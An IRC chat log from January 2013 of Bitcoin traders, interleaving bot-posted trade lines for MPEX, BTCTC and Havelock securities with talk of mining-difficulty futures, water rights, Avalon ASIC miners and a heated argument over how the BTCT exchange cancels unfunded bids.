[MPEX] [S.MPOE] 9950 @ 0.00063715 = 6.3396 BTC [-] Jan 29 21:35:50 [MPEX] [S.MPOE] 2101 @ 0.00063681 = 1.3379 BTC [-] Jan 29 21:35:51 [MPEX] [S.MPOE] 4621 @ 0.00063663 = 2.9419 BTC [-] Jan 29 21:35:52 [MPEX] [S.MPOE] 18945 @ 0.00063637 = 12.056 BTC [-] Jan 29 21:35:53 [MPEX] [S.MPOE] 4186 @ 0.00063567 = 2.6609 BTC [-] Jan 29 21:35:54 [MPEX] [S.MPOE] 16997 @ 0.0006356 = 10.8033 BTC [-] Jan 29 21:35:55 [MPEX] [S.MPOE] 12619 @ 0.00063517 = 8.0152 BTC [-] Jan 29 21:35:56 [MPEX] [S.MPOE] 12049 @ 0.00063511 = 7.6524 BTC [-] Jan 29 21:35:57 [MPEX] [S.MPOE] 6200 @ 0.00063443 = 3.9335 BTC [-] Jan 29 21:35:58 [MPEX] [S.MPOE] 2831 @ 0.00063414 = 1.7953 BTC [-] Jan 29 21:35:59 [MPEX] [S.MPOE] 4277 @ 0.00063378 = 2.7107 BTC [-] Jan 29 21:36:00 [MPEX] [S.MPOE] 8010 @ 0.00063369 = 5.0759 BTC [-] Jan 29 21:36:01 [MPEX] [S.MPOE] 2340 @ 0.00063335 = 1.482 BTC [-] Jan 29 21:36:13 dangerous indeed :) Jan 29 21:36:16 !ticker m s.mpoe Jan 29 21:36:17 lol Jan 29 21:36:18 [MPEX:S.MPOE] 1D: 0.00063335 / 0.0006497 / 0.00066703 (1105501 shares, 718.25 BTC), 7D: 0.00059445 / 0.00066286 / 0.0007 (23174858 shares, 15,361.69 BTC), 30D: 0.00059445 / 0.00065485 / 0.0007 (51526236 shares, 33,742.24 BTC) Jan 29 21:37:01 lol, good remark (when you see context) http://www.reddit.com/r/Bitcoin/comments/17ga7r/longtime_bitcoin_users_what_was_it_like_after_the/c85kquc Jan 29 21:37:06 [MPEX] [S.MPOE] 4321 @ 0.0006337 = 2.7382 BTC [+] Jan 29 21:37:08 [MPEX] [S.MPOE] 4029 @ 0.0006335 = 2.5524 BTC [-] Jan 29 21:37:24 well, one of the key things I don't want are the ponzi kind of things to take off, so tot volume on those just ends up being a promotion... Jan 29 21:38:21 judging by the recent experience of the gem thingee, btc market is a lot more mature. Jan 29 21:38:37 that thing'd have been so hot a coupla years ago... Jan 29 21:38:40 lol jurov Jan 29 21:38:49 queen of the snide Jan 29 21:39:39 [MPEX] [S.MPOE] 13627 @ 0.00063351 = 8.6328 BTC [+] Jan 29 21:43:10 [MPEX] [X.IDIFF.MAR] 20 @ 0.089 = 1.78 BTC [+] Jan 29 21:43:23 omfg. these actually trade ?! Jan 29 21:44:05 i'm tryting to do something w/them Jan 29 21:44:35 they should be pretty straightforward, i have no idea why people don't use them a lot more. Jan 29 21:44:51 yes, just that trying anything beyond MAR is is just insane Jan 29 21:45:20 not if you have the mining Jan 29 21:46:08 if you actually have a mining farm active you can calculate both the volume and the price at which you should be buying to make a profit. Jan 29 21:46:40 it was a reasonable purchase Jan 29 21:46:45 whether i do or not, the collateral requirement causes it to be unattractive. compared to what else can be done with the cash Jan 29 21:46:49 I was thinking of covering my short 20 MARs Jan 29 21:46:51 triple by midmarch, i guess so Jan 29 21:47:05 jurov if you have a mine you buy them not sell them Jan 29 21:47:07 but someone else got it I guess Jan 29 21:47:26 if you have a lot of btc it makes sense to sell some, maybe Jan 29 21:47:30 but the calculations are more complex. Jan 29 21:47:31 ic. ust that someone has to offer them Jan 29 21:47:45 one can put a bid in whether someone offers any or not Jan 29 21:48:56 i'd go as far as to say it's financially irresponsible for any large-ish mining operation to not hedge diff Jan 29 21:49:06 but then again i guess miners aren't (yet) too sophisticated, financially. Jan 29 21:49:58 perhaps someone can write article to btcmag with all the scenarios ELI5 Jan 29 21:50:02 [BTCTC] [COGNITIVE] 2 @ 0.35 = 0.7 BTC [+] Jan 29 21:50:16 i can try ask if they'll pay me for that :p Jan 29 21:51:13 o, they pay ?! Jan 29 21:51:26 pirate paid. Jan 29 21:51:39 cabfare or what did he payl ol Jan 29 21:52:24 pirate paid for some rum to the waiter. Jan 29 21:52:38 i heard at least some ppl from mag got paid veeery nicely :D Jan 29 21:52:47 relaxing on a chair on a tropical island Jan 29 21:53:34 jurov you know this reminds me of that joke, someone asks henry miller what sort of writing pays the best Jan 29 21:53:37 "ransom notes" Jan 29 21:55:50 okay. but really, couldn't be the futures covered by S.MPOE for example? Jan 29 21:56:11 what do you mean ? Jan 29 21:57:02 when i do MKFUT, instead of bitcoins, mpex would get equivalent value in S.MPOE from my acct into escrow Jan 29 21:57:34 the complexities of automated actuarial calculation tho... Jan 29 21:57:40 how much is stock worth ? Jan 29 21:58:15 seems more logical to either sell the stock or else pledge it as collateral/repo it with someone who specializes in this Jan 29 21:58:17 same as you computed the mkt cap: qty*price :D Jan 29 21:58:27 im sure someone would be willing to issue short term loans against mpex assets. Jan 29 21:59:03 shit, it has been done with glbse assets Jan 29 21:59:09 why not mpex then :) Jan 29 21:59:30 quite an idea. i can perhaps plunder smickles' short offering to cover IDIFFs Jan 29 21:59:34 mpex actually has all the infrastructure in place, with the signed pushes Jan 29 21:59:55 you can do quite advanced banking stuff on what mpex offers as is, Jan 29 22:00:15 i'd wager you can implement almost all currently used wall street contract types Jan 29 22:00:21 maybe except for some exoticas Jan 29 22:00:25 exotics* Jan 29 22:02:37 infrastructure is there. waiting for people Jan 29 22:04:21 [MPEX] [S.MPOE] 4321 @ 0.0006534 = 2.8233 BTC [+] Jan 29 22:04:23 [MPEX] [S.MPOE] 1124 @ 0.00065373 = 0.7348 BTC [+] Jan 29 22:04:24 [MPEX] [S.MPOE] 800 @ 0.00065374 = 0.523 BTC [+] Jan 29 22:04:26 [MPEX] [S.MPOE] 5693 @ 0.00065412 = 3.7239 BTC [+] Jan 29 22:05:04 !ticker m s.dice Jan 29 22:05:06 [MPEX:S.DICE] 1D: 0.00714694 / 0.00738203 / 0.007395 (85953 shares, 634.51 BTC), 7D: 0.00085848 / 0.00542827 / 0.0075 (1238556 shares, 6,723.23 BTC), 30D: 0.00085848 / 0.00431147 / 0.0075 (10632030 shares, 45,839.74 BTC) Jan 29 22:10:54 ;;rate mircea_popescu 4 runs MPEx. If he scams us, it's probably a good time to shot bitcoin. Jan 29 22:10:55 Rating entry successful. Your rating for user mircea_popescu has changed from 3 to 4. Jan 29 22:11:20 hm Jan 29 22:11:26 ya srsly. Jan 29 22:11:32 id go long-er if mp goes Jan 29 22:11:35 if i could. Jan 29 22:11:41 whyssat ? Jan 29 22:11:54 cause you dont sell coins. Jan 29 22:11:58 :) Jan 29 22:11:58 [BTCTC] [GSDPT] 200 @ 0.0075 = 1.5 BTC [+] Jan 29 22:13:06 ahaha Jan 29 22:13:16 interesting point Jan 29 22:14:28 wait. so if i keep going i benefit bitcoin through developing finance + paying mpoe-pr to aggravate forum people Jan 29 22:14:36 mp, the bold volume bit looks good. thx for that. Jan 29 22:14:37 and if i run off i benefit bitcoin through decreased coin supply ? Jan 29 22:14:40 what am i, mafalda ? Jan 29 22:15:40 burnside it does actually look good. cool. Jan 29 22:15:41 run amok, you can't lose! Jan 29 22:15:42 yeah, well i guess the question is Jan 29 22:15:46 which one of those scenarios Jan 29 22:15:51 has bigger weight Jan 29 22:16:39 maybe i could schroedingerize. Jan 29 22:16:41 http://www.marketoracle.co.uk/article38167.html Jan 29 22:16:48 fresh water speculation Jan 29 22:16:53 been saying it for years Jan 29 22:17:04 "Global Elite Rush to Control Water Worldwide" Jan 29 22:17:12 dude this global elite is like global whores. Jan 29 22:17:16 what the fuck. Jan 29 22:17:46 air and water futures will one day rule the markets Jan 29 22:20:38 so what people should do now Jan 29 22:20:40 so buy mineral water Jan 29 22:20:40 is start buying water and air rights Jan 29 22:22:55 [MPEX] [S.MPOE] 11750 @ 0.00065254 = 7.6673 BTC [-] Jan 29 22:22:57 [MPEX] [S.MPOE] 4321 @ 0.00065403 = 2.8261 BTC [+] Jan 29 22:22:58 [MPEX] [S.MPOE] 6579 @ 0.00065412 = 4.3035 BTC [+] Jan 29 22:23:00 [MPEX] [S.MPOE] 4200 @ 0.00065483 = 2.7503 BTC [+] Jan 29 22:23:01 [MPEX] [S.MPOE] 3150 @ 0.00065483 = 2.0627 BTC [+] Jan 29 22:26:48 < Diablo-D3> is start buying water and air rights << iirc, in 'merica those don't technically exist Jan 29 22:27:05 then the rich shouldnt be able to have them either Jan 29 22:27:28 you cant own something that doesnt exist, they put you in the insane asylum for talk like that Jan 29 22:27:31 water rights exist. There are places where it's illegal to collect rainwater Jan 29 22:27:45 DeadWeasel: yes, and those terrorist nations should be ended Jan 29 22:28:13 http://www.foxnews.com/leisure/2012/08/16/man-jailed-for-collecting-rainwater-in-illegal-reservoirs-on-his-property/ Jan 29 22:28:16 damn right Jan 29 22:28:23 it's happening naturally. Jan 29 22:31:56 smickles: Jan 29 22:32:10 you around for a moment? Jan 29 22:35:33 [MPEX] [S.MPOE] 2900 @ 0.00065035 = 1.886 BTC [-] Jan 29 22:35:35 [MPEX] [S.MPOE] 1612 @ 0.00064706 = 1.0431 BTC [-] Jan 29 22:37:09 [MPEX] [S.MPOE] 2709 @ 0.00064706 = 1.7529 BTC [-] Jan 29 22:37:11 [MPEX] [S.MPOE] 2891 @ 0.00064693 = 1.8703 BTC [-] Jan 29 22:52:32 [MPEX] [S.MPOE] 4321 @ 0.0006547 = 2.829 BTC [+] Jan 29 22:52:34 [MPEX] [S.MPOE] 1479 @ 0.00065483 = 0.9685 BTC [+] Jan 29 22:53:04 [BTCTC] [B.YABMC] 1 @ 0.0261 BTC [+] Jan 29 22:53:06 [BTCTC] [B.YABMC] 34 @ 0.026 = 0.884 BTC [-] Jan 29 23:01:45 I thought water rights were a huge deal in some states Jan 29 23:01:59 yes, its a huge deal because no one has any Jan 29 23:02:20 you have people diverting whole rivers, wasting the water because if they don't take it they'll lose the rights they bought off indians Jan 29 23:03:53 Coinbr checks withdrawal requests manually before accepting them, me likey Jan 29 23:04:28 Schadenfreude: no Jan 29 23:04:32 coinbr PERFORMS them manually Jan 29 23:04:39 its not as clever as you think it is Jan 29 23:05:18 ah, I thought it's a safety feature, not a feat of laziness Jan 29 23:05:42 its all about marketing Jan 29 23:06:36 dub: are you sure they don't just have the right to the land, and if the river moves off the land, that's why they lost it Jan 29 23:07:01 pretty sure it was all about water Jan 29 23:07:11 was on some natgeo docu Jan 29 23:07:25 focused on nevada iirc Jan 29 23:09:18 http://water.nv.gov/waterrights/ Jan 29 23:09:37 hmm, i wonder what I was thinking of then Jan 29 23:10:37 we have some interesting wine country where irrigation water comes from races built by 19th century gold miners Jan 29 23:11:51 the races start in snow melts and run accross many properties but are owned by the property they terminate on, and that owner has the right to do any kind of remedial works onthe other properties to ensure the supply Jan 29 23:13:09 lol, feat of laziness ;) Jan 29 23:13:11 [MPEX] [S.DICE] 842 @ 0.00735836 = 6.1957 BTC [-] Jan 29 23:13:44 dub: so I'd destroy them if they were on my property Jan 29 23:13:45 some are little more than a 1m wide trench but worth untold millions in the wine prudction they enable Jan 29 23:14:00 and then shoot anyone who trespasses on my property Jan 29 23:14:09 Diablo-D3: then I would show up on your property with the police and a lot of earthworking equipment to restore the damage Jan 29 23:14:24 and you would be shot for trespassing Jan 29 23:14:24 in 16th century before steam engine invetion, rain actually powered water pumps in gold mines Jan 29 23:14:25 tearing up your vinyard in the process if you want to be a cunt about it Jan 29 23:14:32 no rain = no gold Jan 29 23:14:39 lol, why would I have a vinyard Jan 29 23:14:42 Im not a druggy Jan 29 23:14:49 fucking druggies, just kill them all Jan 29 23:14:50 thiung is, because we are not Diablo-D3 everyone just gets on with shit and cooperates Jan 29 23:15:09 its the ~american dream Jan 29 23:15:18 er !american dream Jan 29 23:16:24 i guess this is why Diablo-D3 doesn't have a propertah Jan 29 23:19:02 [MPEX] [S.MPOE] 890 @ 0.0006471 = 0.5759 BTC [-] Jan 29 23:19:04 [MPEX] [S.MPOE] 2610 @ 0.00064709 = 1.6889 BTC [-] Jan 29 23:19:46 mircea_popescu: in the US, you cannot own property Jan 29 23:20:09 well what do you want, alodial title ? Jan 29 23:20:11 Diablo-D3: you can, but no one will sell it to you Jan 29 23:20:20 heh, dumbass spell check doesn't know what alodial is Jan 29 23:22:35 hello friends Jan 29 23:22:39 [MPEX] [S.MPOE] 1711 @ 0.00064709 = 1.1072 BTC [-] Jan 29 23:22:41 [MPEX] [S.MPOE] 6837 @ 0.00064693 = 4.4231 BTC [-] Jan 29 23:23:55 Lyspooner heya Jan 29 23:24:49 [MPEX] [S.MPOE] 4321 @ 0.00065475 = 2.8292 BTC [+] Jan 29 23:24:49 [MPEX] [S.MPOE] 4771 @ 0.00065483 = 3.1242 BTC [+] Jan 29 23:24:51 [MPEX] [S.MPOE] 2008 @ 0.00065546 = 1.3162 BTC [+] Jan 29 23:44:06 [MPEX] [S.MPOE] 4321 @ 0.00065525 = 2.8313 BTC [-] Jan 29 23:44:07 [MPEX] [S.MPOE] 279 @ 0.00065546 = 0.1829 BTC [+] Jan 29 23:51:39 Avalon batch email: https://bitcointalk.org/index.php?topic=137534.msg1488869#msg1488869 Jan 29 23:52:02 http://puu.sh/1UyQ8 Jan 29 23:52:46 so it hashes ? Jan 29 23:52:52 For 1 million I can make you a picture with words in it too Jan 29 23:53:02 ijs Jan 29 23:53:13 it looks like the avlon unit comes pre-flashes with openwrt Jan 29 23:53:19 if i had to guess Jan 29 23:53:40 i see 69 GH/s in cgminer do 800+ shares/min Jan 29 23:53:59 that's not a minirig and it isn't GPU's Jan 29 23:57:08 U is 968 Jan 29 23:57:28 see i'm not even paying attention Jan 29 23:58:04 so they are stand alone? no host machine required? Jan 29 23:58:30 i've heard that from the beginning Jan 29 23:58:38 i didn't believe it though Jan 29 23:59:15 wrt makes sense. running cgminer on wrt has been avaialbe for a long time Jan 29 23:59:31 wattage is accurately reported as 'higher than 400w' Jan 29 23:59:43 (of course) Jan 29 23:59:52 if definitely isn't leading the power consumption race Jan 30 00:00:01 typical chinese, 'of course i lied, lol' Jan 30 00:00:16 lol Jan 30 00:00:20 i mean ror Jan 30 00:00:51 but out of the box ready to mine with software is a game changer Jan 30 00:00:56 if you ask me Jan 30 00:01:11 jcpham someone was opining that they got 300 chips of which 10 work Jan 30 00:01:16 and made 3 boxes out of them Jan 30 00:01:48 i haven't read ny of the forum fud Jan 30 00:01:58 surrounding any of the asic stuff Jan 30 00:02:09 I burnt out on it pretty quick Jan 30 00:02:42 >9000 troll to 1 usefull post Jan 30 00:02:48 i get digests Jan 30 00:02:52 exactly Jan 30 00:02:59 you should resell those Jan 30 00:03:06 i'm not even interested in digests Jan 30 00:03:10 make some more money out of your girl Jan 30 00:03:34 -otc is getting or is like that now too Jan 30 00:03:42 >getting Jan 30 00:08:40 dub i kinda open source them Jan 30 00:09:02 [HAVELOCK] [HIM] 1 @ 13.8 BTC [+] Jan 30 00:09:47 orly? Jan 30 00:10:06 HIM? Jan 30 00:10:39 "ASIC's are not a natural technological generation leap like going from CPU to GPU was. ASIC's are simply specialized processing units made specifically for Bitcoin. Which i do not beleive is following the original intentions of Satoshi, for many reasons." Jan 30 00:10:45 not reading the forum ? missing out. Jan 30 00:11:30 lol who was that? Jan 30 00:12:16 a thread Jan 30 00:12:23 17k words from 17 post noob Jan 30 00:12:29 knowing better about everything. Jan 30 00:12:56 "Would it be even remotely possible to force the change in sha256 bitcoin algorith to something else that asic and fpga devices couldnt compute? Jan 30 00:12:56 We started off with a bitcoin that anyone could use and now were forced to buy stuff we dont really want. Jan 30 00:12:56 I realise that there are some ppl that allready invested in asic and fpga, but ton off ppl are unsatisfied with this. Jan 30 00:12:56 Do U think btc should move away from sha256 and let "normal" people the chance ?" Jan 30 00:13:05 i have a special section "top 5 most idiotic things" Jan 30 00:14:59 [BTCTC] [RSM] 112 @ 0.0089 = 0.9968 BTC [-] Jan 30 00:15:31 they'll rather whine instead of improving litecoin Jan 30 00:15:48 where did that text come from Jan 30 00:16:34 jcpham the forum Jan 30 00:17:05 let's go to sha 257 Jan 30 00:17:13 asics won't stand a chance Jan 30 00:17:13 mircea_popescu but 16 posts means he learned a lot about the bitty coins Jan 30 00:17:16 and the asics Jan 30 00:17:29 yes i agree Jan 30 00:18:55 actually https://bitcointalk.org/index.php?topic=139704.msg1488175#msg1488175 thats pretty good Jan 30 00:19:12 chinese scammer impersonating or actualy avalon guy scamming ? Jan 30 00:20:23 [BTCTC] [BTC-BOND] 798 @ 0.01 = 7.98 BTC [+] Jan 30 00:22:04 Jan 30 00:22:04 chinese scammer impersonating or actualy Jan 30 00:22:16 avalon guy scamming ? << futurama fry right there Jan 30 00:22:58 i never watched that 1 Jan 30 00:24:15 people need more BTC-BOND Jan 30 00:24:20 [BTCTC] [GSDPT] 1 @ 0.0075 BTC [+] Jan 30 00:35:10 [MPEX] [S.DICE] 258 @ 0.00730771 = 1.8854 BTC [-] Jan 30 00:36:27 [MPEX] [S.DICE] 300 @ 0.00734366 = 2.2031 BTC [+] Jan 30 00:39:42 [MPEX] [S.MPOE] 6992 @ 0.00065546 = 4.583 BTC [+] Jan 30 00:39:44 [MPEX] [S.MPOE] 4088 @ 0.00065567 = 2.6804 BTC [+] Jan 30 00:41:29 anyone here can give me some data on mining implements ? Jan 30 00:42:20 So are the taking the second order money before anyone confirms receiving a functional unit? Jan 30 00:42:35 trying to. Jan 30 00:42:36 Go Eskimo! Jan 30 00:43:10 ;;help Jan 30 00:43:11 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Jan 30 00:43:41 [MPEX] [S.MPOE] 5750 @ 0.00064923 = 3.7331 BTC [-] Jan 30 00:43:43 [MPEX] [S.MPOE] 4321 @ 0.00064699 = 2.7956 BTC [-] Jan 30 00:43:44 [MPEX] [S.MPOE] 5379 @ 0.00064693 = 3.4798 BTC [-] Jan 30 00:47:23 [BTCTC] [B.YABMC] 1 @ 0.025 BTC [-] Jan 30 00:49:24 since this channel was quoted into fhe forums, I responded and am posting that response here. Perhaps someone will quote this line as well. https://bitcointalk.org/index.php?topic=139755.msg1489006#msg1489006 Jan 30 00:50:25 Namworld: btw, I think those bonus divs were a great use of the pre-timed payouts to get some sales. I think it helped alot for getting shares out. :) Jan 30 00:53:32 ;;calc 185 Jan 30 00:53:33 185 Jan 30 00:53:37 ;;bc,diff 185 Jan 30 00:53:38 2968775.3320751 Jan 30 00:53:43 ;;bc,calc 185 Jan 30 00:53:43 use the 'gentime' command instead Jan 30 00:53:50 ;;gentime 185000 Jan 30 00:53:51 The average time to generate a block at 185000.0 Mhps, given difficulty of 2968775.33208, is 19 hours, 8 minutes, and 44 seconds Jan 30 00:53:54 yeah. Well I had indeed made great profit trading options... Jan 30 00:54:41 Bonuses I give on BTC-BOND are a very small fraction of what I make. Jan 30 00:56:27 and its not required, so its pretty cool :) Jan 30 00:56:57 reminds me of when I had my JAH shares on glbse, and rasta paid divs nightly, even though he only had to paid weekly. Jan 30 01:01:28 Ukto, just so we're clear. Anytime you post something that is incorrect, wrong, or misleading, I'm going to post a follow up with the truth. If that bothers you, I'm sorry, but it has to be done. If you don't want to be called a liar, then don't say definitively that something is true when it is not. Jan 30 01:02:30 ah, how about a rebuttle where the statement was? Jan 30 01:02:36 A bit overkill for forums isnt it? Jan 30 01:02:42 for something that to this moment looks to be ture? Jan 30 01:02:43 true? Jan 30 01:03:09 still have no idea what asking about outstanding shares has to do with lieing or fud Jan 30 01:03:26 unless your whole goal is to troll and try to make me look bad ? Jan 30 01:03:59 How could it look to be true that the order book is not backed? Orders you cannot afford get canceled... the functionality is plain and simple. And, you did not even try it? Jan 30 01:04:16 The looking bad part I think you accomplish just fine on your own. Jan 30 01:04:23 i cant force wsomeone to buy my shares. Jan 30 01:04:44 so if I have 20btc, and put 6 5btc bids on assets Jan 30 01:04:47 and one clears Jan 30 01:04:49 which ones get canceled? Jan 30 01:04:49 i'll try it now Jan 30 01:04:56 all of them? Jan 30 01:05:01 go go gadget pigeons Jan 30 01:05:06 you can't put 6 4 btc bids with 20 btc... Jan 30 01:05:09 the question is when do orders you can't afford get cancelled Jan 30 01:05:13 errr, 6 5 btc bids Jan 30 01:05:20 fine, call it 30 Jan 30 01:05:25 wel Jan 30 01:05:26 actually Jan 30 01:05:26 why not? Jan 30 01:05:31 you reserves are per asset Jan 30 01:05:31 right? Jan 30 01:05:35 or did deprived lie? Jan 30 01:05:45 across assets, sure, but not on the same asset Jan 30 01:05:50 *grabs popcorn* Jan 30 01:05:50 i never said same asset Jan 30 01:05:53 so lets go back to $20 Jan 30 01:05:54 er Jan 30 01:05:55 20btc Jan 30 01:05:59 6 5btc bids Jan 30 01:06:01 6 assets Jan 30 01:06:03 one clears Jan 30 01:06:06 yes, the rest of how it works has been beaten to death Jan 30 01:06:10 are all canceled? Jan 30 01:06:12 [BTCTC] [BTC-BOND] 200 @ 0.01 = 2 BTC [+] Jan 30 01:06:13 I get that you don't like it. Jan 30 01:06:21 answer my question Jan 30 01:06:25 one 5btc order clears Jan 30 01:06:29 ok it cancelled other orders Jan 30 01:06:29 are all teh rest canceled? Jan 30 01:06:33 as for how it chose Jan 30 01:06:36 pigeons: all of them ? Jan 30 01:06:41 or just random Jan 30 01:06:51 it isn't transparent how it chose Jan 30 01:06:51 ahh, good question. on the bids side your highest bids get canceled. Jan 30 01:06:56 in order Jan 30 01:07:02 ahh, and its instant? Jan 30 01:07:05 yes Jan 30 01:07:06 nope not all of them Jan 30 01:07:09 apparently from the sound of pigeons Jan 30 01:07:09 it's part of the order process Jan 30 01:07:18 and not all of them, just the ones you can no longer afford Jan 30 01:07:32 when it accepts your order it cancells others for insufficient funds Jan 30 01:07:37 yes Jan 30 01:07:46 yup, thats cool and nice to know Jan 30 01:07:51 just don't accept the order Jan 30 01:07:52 but not what I was going on about. :) Jan 30 01:08:13 I was saying that in my opinion i feel its a lie to show X btc worth on the books when its not actually there Jan 30 01:08:18 [MPEX] [S.DICE] 4100 @ 0.007395 = 30.3195 BTC [+] Jan 30 01:08:23 and can be abused for pumping Jan 30 01:08:30 whcih is why the major stock exchange do not do it Jan 30 01:08:37 I thought about that pigeons, but that's a ui issue where I decided that the order they're placing should rank higher than orders they already had. (what they want to do NOW outranks what they wanted to do yesterday.) Jan 30 01:09:00 How is it a lie? all bids on the book can be filled right away Jan 30 01:09:01 so the question is Jan 30 01:09:03 sometimes you guestimate, if it lets me do it i mathjed right, not here ;) Jan 30 01:09:16 It can just removes demand on other assets at the same time. Jan 30 01:09:18 Namworld: so all 6 of my 5btc pids could instnatly be filled even tho I have 20btc? Jan 30 01:09:33 no Jan 30 01:09:37 its not fake cause it cancels immediately i agree, but also i dont think its user friendly, shouldnt accept the order Jan 30 01:09:38 so say I am dumping my shares of all my assets Jan 30 01:09:45 inb4 race attack causes account balance to go negative Jan 30 01:09:47 [MPEX] [S.MPOE] 5950 @ 0.00065006 = 3.8679 BTC [+] Jan 30 01:09:48 locking on the backend would essentially work such that only your first 20btc of bids would go through Jan 30 01:09:48 [MPEX] [S.MPOE] 1464 @ 0.00064716 = 0.9474 BTC [-] Jan 30 01:09:58 i look, and see hey, if i sell 500 share sof each asset, i should get X Jan 30 01:10:01 i start with asset A Jan 30 01:10:06 i goto asset B Jan 30 01:10:09 and now low and behold Jan 30 01:10:20 the books are dramatically changed Jan 30 01:10:23 some bids have vanished, yes. Jan 30 01:10:25 and now I cant get what I expected Jan 30 01:10:30 because it wasnt actually there Jan 30 01:10:41 you could play games Jan 30 01:10:50 and say its no diff than a bot auto moving orders Jan 30 01:10:55 but there is a level of expectancy Jan 30 01:10:59 so that is my opinion Jan 30 01:11:08 that is it a lie. Jan 30 01:11:27 that's always the case though, on a larger exchange the books are always changing. Jan 30 01:11:28 as a trader, I like to know that the books are there Jan 30 01:11:37 it's accurate as of when you load the book Jan 30 01:11:39 and that my own actions are not damanging other possible actions Jan 30 01:11:44 yeah. Orderbook is true only for the asset you're currently looking at... I don't see the problem with bids on other assets disappearing upon filling that orderbook Jan 30 01:11:52 Namworld: that is true. Jan 30 01:11:59 thus it is my opinion Jan 30 01:12:03 It only prevents evaluating all orderbooks at once Jan 30 01:12:03 and how I feel about it. :) Jan 30 01:12:05 and that is yours Jan 30 01:12:21 Yup Jan 30 01:12:32 but evaluating one individually will always show an accurate orderbook and that's all I care about. Jan 30 01:12:32 we don't make any claims anywhere for "XX in bids are up across the whole exchange RIGHT NOW" Jan 30 01:12:35 I think, also to some degree, it misrepresents market size as well Jan 30 01:12:44 i just spent 2 btc on btc-bond to learn how this works Jan 30 01:13:01 heh, thanks pigeons, we need the volume! Jan 30 01:13:12 It works by giving you 0.0006 BTC daily Jan 30 01:13:32 errr, assbot has been pretty quiet tho Jan 30 01:13:34 :) Jan 30 01:13:53 on 2 BTC Jan 30 01:13:54 [MPEX] [S.MPOE] 9900 @ 0.0006543 = 6.4776 BTC [+] Jan 30 01:13:55 [MPEX] [S.MPOE] 4321 @ 0.00065561 = 2.8329 BTC [+] Jan 30 01:13:56 So in the end, I told the truth, that you can set bids on a per asset basis, right? Jan 30 01:13:56 [MPEX] [S.MPOE] 928 @ 0.00065567 = 0.6085 BTC [+] Jan 30 01:13:57 [MPEX] [S.MPOE] 6515 @ 0.00065602 = 4.274 BTC [+] Jan 30 01:14:09 yes Jan 30 01:14:24 no, you lied. you stated unequivocally that you could place 100 btc bids on all assets, withdraw 100 btc, and all your bids would remain. Jan 30 01:14:44 whut? O.o Jan 30 01:14:46 and I put in my reubutle it was based on what I could see Jan 30 01:14:51 and what your system showed Jan 30 01:14:58 which you stated was accurate Jan 30 01:15:00 [12:05] on btct, I can fill my account with 100btc, put up to 100btc orders on each asset, and withdraw the 100btc Jan 30 01:15:23 [12:05] and then its a complete, lie Jan 30 01:15:42 [12:06] Regardless of 'pumping the numbers', i think traders have a right to knwo that a bid is actually backed, and not just a fake number on the books. Jan 30 01:15:51 ALL bids are backed. Jan 30 01:15:57 as of the time you load the book Jan 30 01:15:58 on a per asset basis Jan 30 01:16:09 when looking at the overall market page Jan 30 01:16:11 its incorrect then Jan 30 01:16:38 When you withdraw or transfer it cancels your orders you can no longer afford. Plain. Simple. Effective. I even have a display on the withdrawal page clearly showing the maximum you can withdraw without orders getting canceled -- AND, this behavior has been discussed to death in the btct/litecoinglobal threads. Jan 30 01:16:44 I don't say anything about bid depth or order depth on the market. Jan 30 01:16:51 Clearly, plain and simple.. wow... that must be the cause of the problem right there. Jan 30 01:16:51 I have 35.5 btc in my account, I have a 35btc order up for a security right now. Jan 30 01:16:51 The withdraw page clearly, plainly, and simply says I have 35.5btc available to withdraw. No further details. Jan 30 01:17:07 you state current bid price Jan 30 01:17:17 which if one of those is touched, could drasticlly change others Jan 30 01:17:21 but Jan 30 01:17:24 thats not here nor there Jan 30 01:17:30 as has been said Jan 30 01:17:36 we all have our diff opinions on it Jan 30 01:17:45 "No further details" is another piece of FUD. right below the max withdraw: "On the Order Book: YY BTC (not on the order book: XX-YY BTC)" Jan 30 01:17:58 the word max is not on my page Jan 30 01:18:28 withdrawing is just like automated cancellations Jan 30 01:19:44 The withdrawal page => https://btct.co/transfers Jan 30 01:19:49 We only have one... Jan 30 01:19:54 https://www.dropbox.com/s/6ruh8ax2w9vwgdj/withdraw.png Jan 30 01:19:56 nothing about a max Jan 30 01:19:59 it just give sme a balance Jan 30 01:20:12 lol Jan 30 01:20:24 you have to set a withdrawal address before withdrawal is even available... Jan 30 01:20:25 nothing about order cancelation Jan 30 01:20:25 etc Jan 30 01:20:32 it doesnt say its not available Jan 30 01:20:48 sorry if the site is confusing Jan 30 01:21:13 obviously any withdrawal is unavailable until you set an address, it says it in plain english... Jan 30 01:21:28 sure Jan 30 01:21:45 "Withdrawal becomes available once you have set your withdrawal address" Jan 30 01:21:50 Yup Jan 30 01:21:55 glad it will be an option Jan 30 01:22:01 i'll take my 35btc. ;) Jan 30 01:22:07 when I am ready Jan 30 01:22:09 as i said, I was talking Jan 30 01:22:11 pure chat Jan 30 01:22:12 in here Jan 30 01:22:19 with a couple people Jan 30 01:22:35 if it was someone else Jan 30 01:22:42 would you have taken it to the forums Jan 30 01:22:47 and called them a liar? Jan 30 01:22:51 for making a simple mistake? Jan 30 01:22:59 because there is no documentation anywhere on yoru site Jan 30 01:23:00 on what happens Jan 30 01:23:02 and how it happens Jan 30 01:23:09 no Jan 30 01:23:12 you are picking on me specifically Jan 30 01:23:16 to lower my credibility. Jan 30 01:23:24 so just stop. k? :) Jan 30 01:23:38 I'll be honest, I hold you to a higher standard. There was no simple mistake. What you stated was not true and you stated it clearly, intentionally, and in a way that damages the company. Jan 30 01:23:49 hmm Jan 30 01:23:54 soudns liek things you have done on teh forums Jan 30 01:24:03 guess were both the same. :) Jan 30 01:24:18 except I was just talking with a few friends Jan 30 01:24:20 in an irc channel Jan 30 01:24:27 where you have gone out of your way to make false assertions Jan 30 01:24:30 in public view Jan 30 01:24:37 that may be, but I don't think so. I haven't made anything up about BitFunder and stated it as fact. Jan 30 01:24:57 sigh Jan 30 01:25:14 then you really dont realize when you make false assertions ? Jan 30 01:25:21 this is really a matter of not thinking things through ? Jan 30 01:25:53 or cecking facts before making statements? Jan 30 01:26:08 Apparently that was me when just talking on irc Jan 30 01:26:17 as I clicked through things Jan 30 01:26:23 trying to udnerstand something that was not documented Jan 30 01:26:27 I've made lots of mistakes, mostly in terms of getting sucked into petty bickering. Jan 30 01:26:36 but your the one who continues it Jan 30 01:26:38 and starts it Jan 30 01:26:50 and the puts it out for EVERYONE to see Jan 30 01:27:05 I think we've come full circle: [15:00] Ukto, just so we're clear. Anytime you post something that is incorrect, 